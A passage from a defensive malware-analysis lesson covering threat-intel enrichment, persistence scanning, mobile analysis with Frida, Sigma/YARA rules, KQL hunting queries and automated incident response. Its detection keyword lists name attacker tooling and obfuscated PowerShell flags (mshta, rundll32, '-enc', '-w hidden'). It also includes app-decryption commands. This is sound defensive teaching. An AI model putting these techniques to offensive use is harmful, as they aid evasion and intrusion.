                "first_seen": data["data"]["attributes"]["first_submission_date"]
            }
        return None
    
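    def check_otx_pulses(self, indicator):
        from OTXv2 import OTXv2
        import IndicatorTypes  # ships with the OTX Python SDK
        otx = OTXv2(self.otx_api_key)
        
        # indicator is expected to be a SHA-256 file hash
        pulses = otx.get_indicator_details_full(IndicatorTypes.FILE_HASH_SHA256,
                                                indicator)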
        return {
            "pulse_count": len(pulses["general"]["pulse_info"]["pulses"]),
            "pulses": pulses["general"]["pulse_info"]["pulses"][:5]  # Top 5
        }
    
    def submit_to_misp(self, analysis_results):
        from pymisp import PyMISP, MISPEvent, MISPObject
        
        misp = PyMISP(self.misp_url, self.misp_key)
        event = MISPEvent()
        event.info = f"Automated Analysis: {analysis_results['hash']}"
        event.threat_level_id = 2  # Medium
        event.analysis = 2  # Completed
        
        # Add file object
        file_obj = MISPObject('file')
        file_obj.add_attribute('sha256', value=analysis_results['hash'])
        file_obj.add_attribute('filename', value=analysis_results.get('filename', 'unknown'))
        
        # Add network indicators
        for domain in analysis_results.get('contacted_domains', []):
            event.add_attribute('domain', domain)
        
        event.add_object(file_obj)
        result = misp.add_event(event)
        return result

Automated Reporting

Report Generation:

from datetime import datetime
from jinja2 import Template
import pdfkit

class ReportGenerator:
    def __init__(self, template_path):
        with open(template_path, 'r') as f:
            self.template = Template(f.read())
    
    def generate_html_report(self, analysis_results):
        html_content = self.template.render(
            sample=analysis_results,
            timestamp=datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
            analyst="Automated Analysis System"
        )
        return html_content
    
    def generate_pdf_report(self, analysis_results, output_path):
        html_content = self.generate_html_report(analysis_results)
        
        options = {
            'page-size': 'A4',
            'margin-top': '0.75in',
            'margin-right': '0.75in',
            'margin-bottom': '0.75in',
            'margin-left': '0.75in',
            'encoding': "UTF-8",
            'no-outline': None
        }
        
        pdfkit.from_string(html_content, output_path, options=options)

8. Advanced Persistence Mechanism Analysis

Registry Persistence

Common Registry Locations:

# Registry monitoring script
import winreg

PERSISTENCE_KEYS = [
    (winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run"),
    (winreg.HKEY_LOCAL_MACHINE, r"Software\Microsoft\Windows\CurrentVersion\Run"),
    (winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\RunOnce"),
    (winreg.HKEY_LOCAL_MACHINE, r"Software\Microsoft\Windows\CurrentVersion\RunOnce"),
    (winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices"),
    (winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce"),
    # Image File Execution Options (IFEO)
    (winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"),
    # AppInit_DLLs
    (winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"),
    # Winlogon
    (winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"),
]

def scan_persistence_registry():
    findings = []
    
    for hive, key_path in PERSISTENCE_KEYS:
        try:
            key = winreg.OpenKey(hive, key_path, 0, winreg.KEY_READ)
            
            i = 0
            while True:
                try:
                    name, value, value_type = winreg.EnumValue(key, i)
                    findings.append({
                        "hive": hive,
                        "key": key_path,
                        "name": name,
                        "value": value,
                        "suspicious": analyze_suspicious_entry(name, value)
                    })
                    i += 1
                except OSError:
                    # EnumValue raises OSError once the index runs past the last value
                    break
                    
            winreg.CloseKey(key)
        except Exception as e:
            continue
    
    return findings

def analyze_suspicious_entry(name, value):
    suspicious_indicators = [
        "powershell",
        "cmd.exe /c",
        "wscript",
        "mshta",
        "rundll32",
        "regsvr32",
        "-enc",
        "-nop",
        "-w hidden",
        "http://",
        "https://",
        ".ps1",
        ".vbs",
        ".js"
    ]
    
    # Registry values can be int, bytes, or a list (REG_MULTI_SZ), so coerce to str
    value_lower = str(value).lower()
    return any(indicator in value_lower for indicator in suspicious_indicators)

Scheduled Task Persistence

Analyzing Scheduled Tasks:

# PowerShell script to examine scheduled tasks
$suspiciousTasks = Get-ScheduledTask | Where-Object {
    $_.Actions.Execute -match 'powershell|cmd|wscript|mshta|rundll32' -or
    $_.Actions.Arguments -match '-enc|-nop|hidden|http'
} | Select-Object TaskName, TaskPath, State, Author, Date, Actions

# Export detailed task information
foreach ($task in $suspiciousTasks) {
    # Pass TaskPath as well; TaskName alone may not resolve tasks outside the root folder
    $taskInfo = Get-ScheduledTaskInfo -TaskName $task.TaskName -TaskPath $task.TaskPath
    $task | Add-Member -NotePropertyName LastRunTime -NotePropertyValue $taskInfo.LastRunTime
    $task | Add-Member -NotePropertyName NextRunTime -NotePropertyValue $taskInfo.NextRunTime
    
    # Export task XML for analysis (the output folder must already exist)
    Export-ScheduledTask -TaskName $task.TaskName -TaskPath $task.TaskPath | 
        Out-File "C:\Analysis\Tasks\$($task.TaskName).xml"
}

Service-Based Persistence

Service Analysis:

import wmi
import subprocess

def analyze_services():
    c = wmi.WMI()
    suspicious_services = []
    
    for service in c.Win32_Service():
        # Check for suspicious characteristics
        if any([
            not service.PathName,
            service.PathName and 'temp' in service.PathName.lower(),
            service.PathName and 'appdata' in service.PathName.lower(),
            service.PathName and any(sus in service.PathName.lower() 
                for sus in ['powershell', 'cmd.exe', 'wscript']),
            service.StartName and service.StartName.lower() not in 
                ['localsystem', 'nt authority\\system', 'nt authority\\localservice', 
                 'nt authority\\networkservice']
        ]):
            suspicious_services.append({
                'name': service.Name,
                'display_name': service.DisplayName,
                'path': service.PathName,
                'start_type': service.StartMode,
                'account': service.StartName,
                'state': service.State,
                'description': service.Description
            })
    
    return suspicious_services

# Check for service DLL hijacking
def check_service_dll_hijacking():
    # Query services that load DLLs
    output = subprocess.check_output([
        'wmic', 'service', 'where', 
        "PathName like '%svchost.exe%'", 
        'get', 'Name,PathName,ProcessId'
    ], text=True)
    
    # Check each svchost service's loaded DLLs
    # ... (implementation details)

9. Mobile Malware Analysis Fundamentals

Android Malware Analysis

Setting Up Android Analysis Environment:

1. Android Virtual Device (AVD):

# Create AVD with Google APIs (for Play Services)
avdmanager create avd -n malware_analysis -k "system-images;android-29;google_apis;x86"

# Start emulator with writable system
emulator -avd malware_analysis -writable-system -no-snapshot

2. Essential Tools:

  • jadx: DEX to Java decompiler
  • apktool: APK reverse engineering
  • Frida: Dynamic instrumentation
  • MobSF: Mobile Security Framework

Static Analysis Workflow:

# Extract APK contents
apktool d malicious.apk -o malicious_decoded/

# Examine AndroidManifest.xml
cat malicious_decoded/AndroidManifest.xml | grep -E "permission|service|receiver"

# Decompile to Java
jadx malicious.apk -d jadx_output/

# Search for suspicious patterns
grep -r "exec\|Runtime\|ProcessBuilder" jadx_output/
grep -r "DexClassLoader\|PathClassLoader" jadx_output/
grep -r "android.permission.SEND_SMS" jadx_output/
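
The manifest review can also be scripted. The sketch below parses the text manifest produced by apktool (not the binary XML inside the raw APK) and reports requested permissions from a short, illustrative high-risk list; the sample manifest and package name are invented.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
# Illustrative shortlist, not a complete set of risky permissions
HIGH_RISK = {
    "android.permission.SEND_SMS",
    "android.permission.READ_SMS",
    "android.permission.BIND_ACCESSIBILITY_SERVICE",
    "android.permission.SYSTEM_ALERT_WINDOW",
}

def risky_permissions(manifest_xml):
    """Return the high-risk permissions requested in a decoded manifest."""
    root = ET.fromstring(manifest_xml)
    requested = {el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")}
    return sorted(requested & HIGH_RISK)

MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.sample">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
</manifest>"""
print(risky_permissions(MANIFEST))
```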

Dynamic Analysis with Frida:

// Frida script to monitor sensitive API calls
Java.perform(function() {
    // Monitor SMS sending
    var SmsManager = Java.use('android.telephony.SmsManager');
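    // sendTextMessage has several overloads on recent Android versions, so select one explicitly
    SmsManager.sendTextMessage.overload('java.lang.String', 'java.lang.String', 'java.lang.String',
        'android.app.PendingIntent', 'android.app.PendingIntent').implementation = function(dest, sc, text, pi, di) {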
        console.log('[SMS] Destination: ' + dest);
        console.log('[SMS] Text: ' + text);
        // Call original method
        return this.sendTextMessage(dest, sc, text, pi, di);
    };
    
    // Monitor file access
    var File = Java.use('java.io.File');
    File.$init.overload('java.lang.String').implementation = function(path) {
        console.log('[File] Accessing: ' + path);
        return this.$init(path);
    };
    
    // Monitor network connections
    var URL = Java.use('java.net.URL');
    // openConnection() and openConnection(Proxy) both exist; hook the no-argument overload
    URL.openConnection.overload().implementation = function() {
        console.log('[Network] Connecting to: ' + this.toString());
        return this.openConnection();
    };
});

iOS Malware Analysis

Jailbroken Device Setup:

1. Essential Cydia Tools:

  • Frida
  • SSL Kill Switch 2
  • dumpdecrypted
  • class-dump

2. Binary Analysis:

# Decrypt the app binary on the device (dumpdecrypted is injected as a dylib)
DYLD_INSERT_LIBRARIES=dumpdecrypted.dylib ./MaliciousApp

# Extract class information
class-dump -H MaliciousApp -o headers/

# Check for suspicious frameworks
otool -L MaliciousApp | grep -v "/System"

10. Threat Hunting with Analysis Results

Creating Detection Rules

Sigma Rules from Analysis:

title: Ransomware File Encryption Activity
id: a1b2c3d4-5678-9012-3456-789012345678
status: experimental
description: Detects mass file encryption typical of ransomware
author: Security Analyst
date: 2024/01/01
logsource:
    product: windows
    service: sysmon
detection:
    selection:
        EventID: 11  # File creation
        TargetFilename|endswith:
            - '.locked'
            - '.encrypted'
            - '.crypto'
    timeframe: 10s
    condition: selection | count() > 100
falsepositives:
    - Legitimate encryption software
level: high
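
The rule's threshold logic can be tested against recorded events before deployment. The sketch models it as a sliding window over file-creation timestamps (in seconds); actual Sigma backends may bucket the timeframe differently, so treat this as an approximation.

```python
from collections import deque

def burst_detected(timestamps, window=10.0, threshold=100):
    """True if more than `threshold` events fall inside any `window` seconds."""
    recent = deque()
    for ts in sorted(timestamps):
        recent.append(ts)
        # Drop events that have fallen out of the window
        while ts - recent[0] > window:
            recent.popleft()
        if len(recent) > threshold:
            return True
    return False

# 150 files written 50 ms apart versus 150 files written 1 s apart
fast = [i * 0.05 for i in range(150)]
slow = [float(i) for i in range(150)]
print(burst_detected(fast), burst_detected(slow))
```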

Converting to YARA:

rule Ransomware_Encryption_Routine {
    meta:
        description = "Detects ransomware encryption functions"
        author = "Analysis Team"
        date = "2024-01-01"
        
    strings:
        $api1 = "CryptGenRandom"
        $api2 = "CryptEncrypt"
        $api3 = "CryptAcquireContext"
        $str1 = "Your files have been encrypted"
        $str2 = ".locked"
        $pattern = {48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 85 C0}
        
    condition:
        uint16(0) == 0x5A4D and
        all of ($api*) and
        any of ($str*) and
        $pattern
}

Threat Hunting Queries

KQL Queries for Threat Hunting:

// Process injection detection
DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName in~ ("notepad.exe", "calc.exe", "svchost.exe")
| where InitiatingProcessFileName !in~ ("services.exe", "winlogon.exe")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, 
         InitiatingProcessFileName, InitiatingProcessCommandLine
| where ProcessCommandLine contains "powershell" or 
        ProcessCommandLine contains "cmd"

// Suspicious PowerShell execution
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "powershell.exe"
| where ProcessCommandLine contains "-enc" or 
        ProcessCommandLine contains "-nop" or
        ProcessCommandLine contains "-w hidden"
| project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessFileName
| summarize Count = count() by DeviceName, bin(Timestamp, 1h)
| where Count > 10

Incident Response Integration

Automated Response Playbook:

class IncidentResponseAutomation:
    def __init__(self, analysis_results):
        self.results = analysis_results
        self.ioc_list = self.extract_iocs()
        
    def extract_iocs(self):
        iocs = {
            'file_hashes': [],
            'domains': [],
            'ip_addresses': [],
            'file_paths': [],
            'registry_keys': [],
            'mutexes': []
        }
        
        # Extract from analysis results
        # ... (parsing logic)
        
        return iocs
    
    def block_network_iocs(self):
        import subprocess
        
        # Windows Firewall rules take IP addresses; remoteip does not accept domain names
        for ip in self.ioc_list['ip_addresses']:
            subprocess.run(['netsh', 'advfirewall', 'firewall', 'add', 'rule',
                          f'name=Block {ip}', 'dir=out', 'action=block',
                          f'remoteip={ip}'])
        
        # Update DNS blackhole (run on the BIND resolver host)
        with open('/etc/bind/blackhole.conf', 'a') as f:
            for domain in self.ioc_list['domains']:
                f.write(f'zone "{domain}" {{ type master; file "/etc/bind/db.blackhole"; }};\n')
    
    def deploy_yara_rules(self):
        # Generate YARA rule from analysis
        rule = self.generate_yara_rule()
        
        # Deploy to endpoints
        # ... (deployment logic)
    
    def create_investigation_timeline(self):
        timeline = []
        
        # Process creation events
        for event in self.results.get('process_events', []):
            timeline.append({
                'timestamp': event['timestamp'],
                'type': 'process_creation',
                'details': event
            })
        
        # Network events
        for event in self.results.get('network_events', []):
            timeline.append({
                'timestamp': event['timestamp'],
                'type': 'network_connection',
                'details': event
            })
        
        # Sort by timestamp
        timeline.sort(key=lambda x: x['timestamp'])
        
        return timeline
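
The parsing logic left open in extract_iocs() could start from plain regular expressions over report text. This is a rough sketch: the patterns are simplified, and the domain pattern will also match file names such as payload.exe, so results need review or a TLD allow-list.

```python
import re

SHA256_RX = re.compile(r"\b[a-fA-F0-9]{64}\b")
IPV4_RX = re.compile(
    r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b")
DOMAIN_RX = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)

def extract_iocs_from_text(text):
    """Pull SHA-256 hashes, IPv4 addresses, and domain-like names from text."""
    return {
        "file_hashes": sorted(set(SHA256_RX.findall(text))),
        "ip_addresses": sorted(set(IPV4_RX.findall(text))),
        "domains": sorted(set(d.lower() for d in DOMAIN_RX.findall(text))),
    }

# Invented report line using documentation-reserved names and addresses
report = "beacon to c2.example.test (203.0.113.7) dropped " + "a" * 64
print(extract_iocs_from_text(report))
```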

This lesson has covered advanced malware analysis techniques including:

  1. Advanced unpacking and deobfuscation methods
  2. Cryptographic function reverse engineering
  3. Sophisticated injection technique analysis
  4. Fileless malware investigation
  5. C2 protocol reverse engineering
  6. Practical ransomware case study
  7. Automation pipeline development
  8. Persistence mechanism analysis
  9. Mobile malware fundamentals
  10. Threat hunting integration

These techniques build upon the fundamentals from Lesson 1, providing security professionals with practical skills for analyzing sophisticated threats. Malware analysis is an evolving field, so continually update your skills and tools to keep pace with emerging threats.

Key Takeaways

  1. Automation is Essential: Build repeatable processes to handle the volume of threats
  2. Context Matters: Understanding the full attack chain is more valuable than isolated IOCs
  3. Share Intelligence: Contributing to the security community strengthens collective defense
  4. Continuous Learning: New techniques emerge constantly - stay current with research

What's next?

  • Practice with malware analysis challenges and CTFs
  • Contribute to open-source security projects
  • Share findings with the security community
  • Build relationships with other analysts

Remember: The goal is always to improve defenses and protect systems, not to enable malicious activities.